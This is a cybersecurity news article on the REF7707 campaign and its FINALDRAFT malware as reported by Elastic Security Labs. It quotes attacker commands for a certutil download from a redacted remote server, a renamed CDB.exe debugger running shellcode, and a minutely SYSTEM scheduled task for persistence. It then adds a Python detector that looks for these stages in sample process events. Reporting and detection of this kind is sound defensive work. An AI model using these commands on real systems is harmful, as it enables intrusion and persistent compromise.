Cyber Security News

REF7707 Hackers Attacking Windows & Linux Machines Using FINALDRAFT Malware

A sophisticated hacking campaign has been unveiled recently by Elastic Security Labs, dubbed “REF7707,” which has been targeting both Windows and Linux systems using novel malware families, including FINALDRAFT, GUIDLOADER, and PATHLOADER.

This campaign has been notable for its advanced tactics and poor operational security, leading to the exposure of additional adversary-owned infrastructure.

The REF7707 campaign was first identified in late November 2024, when Elastic Security Labs observed a cluster of endpoint behavioral alerts at the Foreign Ministry of a South American country.

The investigation uncovered a sprawling campaign with novel malware, sophisticated targeting, and a mature operating cadence.

Security experts at Elastic Security Labs noted that, despite showing high technical competence in some areas, the attackers made tactical oversights that exposed pre-production malware samples and infrastructure.

Execution Flow

The primary execution chain began with the use of Microsoft’s certutil application to download files from a remote server, with commands like the following:

certutil -urlcache -split -f https://[redacted]/fontdrvhost.exe C:\ProgramData
certutil -urlcache -split -f https://[redacted]/fontdrvhost.rar C:\ProgramData

These files were downloaded using Windows Remote Management’s Remote Shell plugin (WinrsHost.exe), indicating that attackers had valid network credentials for lateral movement.

Diamond Model Representation (Source – Elastic)

FINALDRAFT is a key component of the REF7707 intrusion set. It has both Windows and Linux variants and uses an uncommon LOLBin (Living Off The Land Binary) tactic by abusing the Windows-signed debugger CDB.exe, renamed as fontdrvhost.exe.

This binary executes malicious shellcode delivered via a weaponized config.ini file.

C:\ProgramData\fontdrvhost.exe -cf C:\ProgramData\config.ini -o C:\ProgramData

Behavioral Rules Acceleration (Source – Elastic)

FINALDRAFT injects shellcode into processes like mspaint.exe or conhost.exe if no target parameter is provided.

Persistence was achieved using a Scheduled Task that invoked fontdrvhost.exe every minute as SYSTEM:

schtasks /create /RL HIGHEST /F /tn "\Microsoft\Windows\AppID\EPolicyManager\" /tr "C:\ProgramData\fontdrvhost.exe -cf C:\ProgramData\config.ini -o C:\ProgramData" /sc MINUTE /mo 1 /RU SYSTEM
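The three stages above (certutil as a downloader spawned from a WinRM remote shell, the signed debugger CDB.exe running under the name fontdrvhost.exe with a -cf script, and a minutely SYSTEM scheduled task pointing into C:\ProgramData) each leave a distinctive process-creation record. The following Python is an added example written for this article, not Elastic’s detection rules or any code from the campaign: it runs three simple detectors over constructed process events modelled on the command lines quoted above. The event records, the field names and the OriginalFileName values are assumptions made for the example (Sysmon Event ID 1 carries equivalent fields), and the benign cdb.exe event is included to show the renamed-debugger check does not fire on the debugger run under its own name.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    """One process-creation record; field set is an assumption modelled on Sysmon Event ID 1."""
    image: str              # full path of the executed image
    original_filename: str  # OriginalFileName from the PE version resource
    command_line: str
    parent_image: str
    user: str


def tokens(command_line):
    """Split a Windows command line, keeping quoted spans as one token (quotes stripped)."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', command_line)]


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _option(toks, name):
    """Value following a case-insensitive switch such as /tr or -cf, else None."""
    low = [t.lower() for t in toks]
    if name in low and low.index(name) + 1 < len(toks):
        return toks[low.index(name) + 1]
    return None


def detect_certutil_download(ev):
    """certutil -urlcache ... <URL>: the LOLBin download stage."""
    if basename(ev.image) != "certutil.exe":
        return None
    low = [t.lower() for t in tokens(ev.command_line)]
    if "-urlcache" in low and any(t.startswith(("http://", "https://")) for t in low):
        note = "certutil used as a downloader"
        if basename(ev.parent_image) == "winrshost.exe":
            note += " (spawned by the WinRM remote shell: a remote operator with valid credentials)"
        return note
    return None


def detect_renamed_cdb(ev):
    """The Windows debugger (OriginalFileName cdb.exe) executing under another image name."""
    if ev.original_filename.lower() != "cdb.exe" or basename(ev.image) == "cdb.exe":
        return None
    script = _option(tokens(ev.command_line), "-cf")
    return f"CDB.exe running as {basename(ev.image)} with script file {script}"


def detect_schtasks_persistence(ev):
    """schtasks /create with a minutely trigger, SYSTEM principal and an action under ProgramData."""
    if basename(ev.image) != "schtasks.exe":
        return None
    toks = tokens(ev.command_line)
    if "/create" not in [t.lower() for t in toks]:
        return None
    minutely = (_option(toks, "/sc") or "").lower() == "minute" and _option(toks, "/mo") == "1"
    as_system = (_option(toks, "/ru") or "").lower() == "system"
    action = _option(toks, "/tr") or ""
    if minutely and as_system and "\\programdata\\" in action.lower():
        return f"task {_option(toks, '/tn')} runs {action.split()[0]} every minute as SYSTEM"
    return None


DETECTORS = (detect_certutil_download, detect_renamed_cdb, detect_schtasks_persistence)


def scan(events):
    """Return (detector name, finding) pairs for every event that trips a detector."""
    findings = []
    for ev in events:
        for det in DETECTORS:
            hit = det(ev)
            if hit:
                findings.append((det.__name__, hit))
    return findings


# Constructed sample events modelled on the command lines quoted in the article.
# Paths, parents, user names and OriginalFileName values are assumptions for the example.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\certutil.exe", "CertUtil.exe",
                 r"certutil -urlcache -split -f https://[redacted]/fontdrvhost.exe C:\ProgramData",
                 r"C:\Windows\System32\winrshost.exe", "CORP\\svc-admin"),
    ProcessEvent(r"C:\ProgramData\fontdrvhost.exe", "CDB.Exe",
                 r"C:\ProgramData\fontdrvhost.exe -cf C:\ProgramData\config.ini -o C:\ProgramData",
                 r"C:\Windows\System32\cmd.exe", "NT AUTHORITY\\SYSTEM"),
    ProcessEvent(r"C:\Windows\System32\schtasks.exe", "schtasks.exe",
                 r'schtasks /create /RL HIGHEST /F /tn "\Microsoft\Windows\AppID\EPolicyManager\" '
                 r'/tr "C:\ProgramData\fontdrvhost.exe -cf C:\ProgramData\config.ini -o C:\ProgramData" '
                 r"/sc MINUTE /mo 1 /RU SYSTEM",
                 r"C:\Windows\System32\cmd.exe", "NT AUTHORITY\\SYSTEM"),
    # Benign: a developer running the debugger under its own name should not fire.
    ProcessEvent(r"C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe", "CDB.Exe",
                 r"cdb.exe -z C:\dumps\app.dmp", r"C:\Windows\explorer.exe", "CORP\\dev"),
]

if __name__ == "__main__":
    for name, finding in scan(SAMPLE_EVENTS):
        print(f"{name}: {finding}")
```

The renamed-debugger check relies on the version-resource name rather than the on-disk file name, which is the property the fontdrvhost.exe rename does not change; pairing it with the -cf argument narrows it to the script-driven execution the campaign used.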

FINALDRAFT establishes command and control using Microsoft’s Graph API, blending in with legitimate organizational traffic and evading network-based detection.

REF7707 timeline (Source – Elastic)

The campaign heavily utilizes cloud and third-party services for command and control. Domains like support.vmphere[.]com and update.hobiter[.]com were identified in the malware samples.

These domains are part of the adversary-owned infrastructure. In the REF7707 campaign, the attackers leveraged novel malware and abused legitimate tools to evade detection.

The use of FINALDRAFT across both Windows and Linux platforms shows the need for robust cross-platform security measures.


Tushar Subhra Dutta

Tushar is a senior cybersecurity and breach reporter. He specializes in covering cybersecurity news, trends, and emerging threats, data breaches, and malware attacks. With years of experience, he brings clarity and depth to complex security topics.
